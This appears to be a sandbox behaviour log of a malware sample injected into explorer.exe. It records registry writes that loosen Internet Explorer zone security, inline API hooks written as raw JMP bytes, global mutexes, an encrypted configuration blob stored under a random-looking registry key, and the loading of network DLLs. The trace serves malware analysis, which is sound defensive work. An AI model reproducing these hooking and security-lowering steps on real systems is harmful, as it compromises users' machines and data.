Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 Name: 1406 success or wait 1986888002
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 Name: 1406 Type: Dword Data: 0 success or wait 1986889065
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 Name: 1609 success or wait 1986890278
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 Name: 1609 Type: Dword Data: 0 success or wait 1986891357
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 Name: 1406 success or wait 1986891824
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 Name: 1406 Type: Dword Data: 0 success or wait 1986892897
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 Name: 1609 success or wait 1986893348
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 Name: 1609 Type: Dword Data: 0 success or wait 1986894427
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 294F47C Allocation Type: null Protection: page execute and read and write success or wait 1986895226
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 1986896048
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1986896318
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986896596
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986896849
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 0F 7B success or wait 1986897140
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 1986897409
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90D000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 1986897673
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90D1AE Length: 5 Value: E9 33 B7 66 85 success or wait 1986897963
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 1986898244
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 1986899042
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1986899303
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 181000A Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986899643
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986899912
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 181000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 10 7B success or wait 1986900210
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 1986900447
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C916000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 1986900709
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C91632D Length: 5 Value: E9 94 27 66 85 success or wait 1986900999
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C91632D Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 1986901277
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C811195 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 1986901932
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C811195 Length: 30 Value: 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 1986902192
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810014 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986902467
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986902730
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810014 Length: 10 Value: 8B FF 55 8B EC E9 7C 11 00 7B success or wait 1986903025
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C811195 Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 1986903262
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C811000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 1986903524
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C811195 Length: 5 Value: E9 CE 79 76 85 success or wait 1986903814
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C811195 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 1986904092
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94FABE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 1986905257
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94FABE Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 1986905518
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 181001E Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986905793
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986906055
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 181001E Length: 10 Value: 8B FF 55 8B EC E9 9B FA 13 3C success or wait 1986906350
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94FABE Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 1986906585
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94F000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 1986906847
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94FABE Length: 5 Value: E9 97 45 63 C4 success or wait 1986907136
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94FABE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 1986907415
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D95EE89 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 1986908509
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D95EE89 Length: 30 Value: 8B FF 55 8B EC 6A 10 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 19 FD FE FF 5D success or wait 1986908769
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810028 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986909042
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986909303
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810028 Length: 10 Value: 8B FF 55 8B EC E9 5C EE 14 3C success or wait 1986909597
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D95EE89 Length: 5 Value: E9 20 52 62 C4 success or wait 1986910384
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D9BA6BF Length: 30 Value: 8B FF 55 8B EC 51 51 53 33 C0 21 45 FC 21 45 F8 56 57 33 FF 33 DB 33 C9 33 D2 39 45 08 75 success or wait 1986911442
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986911974
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810032 Length: 10 Value: 8B FF 55 8B EC E9 88 A6 1A 3C success or wait 1986912270
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D9BA6BF Length: 5 Value: E9 3E 9A 5C C4 success or wait 1986913057
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D9BA666 Length: 30 Value: 8B FF 55 8B EC 53 56 57 33 DB 33 C9 33 D2 33 F6 33 FF 39 5D 10 75 2C 8B 45 0C 85 C0 74 14 success or wait 1986914112
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986914646
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 181003C Length: 10 Value: 8B FF 55 8B EC E9 25 A6 1A 3C success or wait 1986914941
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D9BA666 Length: 5 Value: E9 33 9B 5C C4 success or wait 1986915727
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D949088 Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 57 33 DB 33 FF F6 05 78 11 9E 3D 01 89 5D FC 0F 84 D9 6A 01 00 success or wait 1986917387
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986917921
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810046 Length: 10 Value: 8B FF 55 8B EC E9 3D 90 13 3C success or wait 1986918215
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D949088 Length: 5 Value: E9 AD B1 63 C4 success or wait 1986919087
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94654B Length: 30 Value: 8B FF 55 8B EC 83 EC 24 53 56 57 33 FF 39 3D B8 11 9E 3D 89 7D F4 89 7D F8 89 7D F0 C7 45 success or wait 1986921021
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986921557
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810050 Length: 10 Value: 8B FF 55 8B EC E9 F6 64 13 3C success or wait 1986921854
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94654B Length: 5 Value: E9 2D DD 63 C4 success or wait 1986922783
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D963381 Length: 30 Value: 8B FF 55 8B EC 83 EC 20 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC 89 5D F4 89 5D F8 C7 45 success or wait 1986924406
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986924942
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 181005A Length: 10 Value: 8B FF 55 8B EC E9 22 33 15 3C success or wait 1986925238
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D963381 Length: 5 Value: E9 36 0F 62 C4 success or wait 1986926026
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94BF83 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1986937430
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986938588
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810064 Length: 10 Value: 8B FF 55 8B EC E9 1A BF 13 3C success or wait 1986956978
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94BF83 Length: 5 Value: E9 7E 83 63 C4 success or wait 1986958091
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94878D Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D F8 89 5D FC 0F 84 C3 65 04 success or wait 1986959814
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986960355
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 181006E Length: 10 Value: 8B FF 55 8B EC E9 1A 87 13 3C success or wait 1986960651
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94878D Length: 5 Value: E9 A0 BB 63 C4 success or wait 1986961444
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1986962289
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986962827
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810078 Length: 10 Value: 8B FF 55 8B EC E9 AE 3D 2A 70 success or wait 1986963123
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 71AB4C27 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1986964752
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986965289
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 71AB68FA Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1986967214
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986967751
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E41ECA3 Length: 30 Value: B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1986969981
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986970519
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E41FE6E Length: 30 Value: B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1986972740
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986973279
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E428D20 Length: 30 Value: 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1986975486
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986976022
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E42C17E Length: 30 Value: 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1986978294
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986978829
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E423D3A Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1986981047
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986981583
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E43E577 Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1986998395
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986998936
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E430833 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1987001145
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987001684
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E44F965 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1987003732
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987004270
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E430A47 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1987006472
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987007009
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E44F9B4 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1987009009
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987009545
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E42A01E Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1987011701
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987012236
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E42A97D Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 2A F6 FF FF 5D C2 14 success or wait 1987014441
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987014978
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E41A39A Length: 30 Value: 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1987017324
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987017862
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E42EA5E Length: 30 Value: 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1987020068
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987020605
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E41AF7F Length: 30 Value: 8B FF 55 8B EC 8B 45 08 83 38 30 0F 85 0B E7 02 00 68 00 01 00 00 6A 00 6A 00 50 E8 C5 F1 success or wait 1987022926
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987023461
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987026225
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987029129
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987031995
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987034759
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987037568
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987040701
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987043566
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987046254
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987048942
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987051721
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987054411
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987056982
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987059717
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987062716
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987065598
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987068406
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987071094
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987073897
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987076581
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1987079385
System info queried Type: ProcessInformation success or wait 1987087255
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 1820000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1987093957
Thread created PID: 1636 TID: 3996 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 1987215155
Mutant created Name: \BaseNamedObjects\Global\{366BFE45-C6D8-191D-185B-81F8EE8A3A3D} success or wait 1987216933
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 Name: Okmaykid object name not found 1987217436
System info queried Type: ProcessInformation success or wait 1987220073
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 1820000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1987227488
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: write and read and execute Type: commit Baseaddress: 29D0000 Size: 245760 Protection: execute Mapped to pid: own pid success or wait 1987228627
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: write and read and execute Type: commit Baseaddress: 29D0000 Size: 245760 Protection: execute Mapped to pid: own pid success or wait 1987230697
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: query and write and read and execute Type: image Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid success or wait 1987235100
Section loaded Path: \KnownDlls\hnetcfg.dll Access: write and read and execute Type: unknown Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid object name not found 1987250770
Section loaded Path: C:\WINDOWS\system32\hnetcfg.dll Access: query and write and read and execute Type: image Baseaddress: 662B0000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 1987252381
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: write and read and execute Type: commit Baseaddress: 1820000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 1987277919
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: write and read and execute Type: commit Baseaddress: 1820000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 1987282627
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: query and write and read and execute Type: image Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 1987284637
Mutant created Name: \BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 1987384007
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 Name: Okmaykid object name not found 1987386765
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Okmaykid Type: Binary Data: 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D E7 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 1987387912
Thread created PID: 1636 TID: 3984 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 1987475269
Mutant created Name: \BaseNamedObjects\Global\{366BFE4A-C6D7-191D-185B-81F8EE8A3A3D} success or wait 1987477010
System info queried Type: ProcessInformation success or wait 1987478199
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 1820000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1987486067
Thread created PID: 1636 TID: 3988 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 1987609525
Mutant created Name: \BaseNamedObjects\Global\{D2C7FACE-C253-FDB1-185B-81F8EE8A3A3D} success or wait 1987611283
System info queried Type: ProcessInformation success or wait 1987615144
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 19E0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1987621898
Section loaded Path: \KnownDlls\RASAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 19E0000 Size: 12288 Protection: read write Mapped to pid: own pid object name not found 1987669698
Section loaded Path: C:\WINDOWS\system32\rasapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76EE0000 Size: 245760 Protection: read write Mapped to pid: own pid success or wait 1987671516
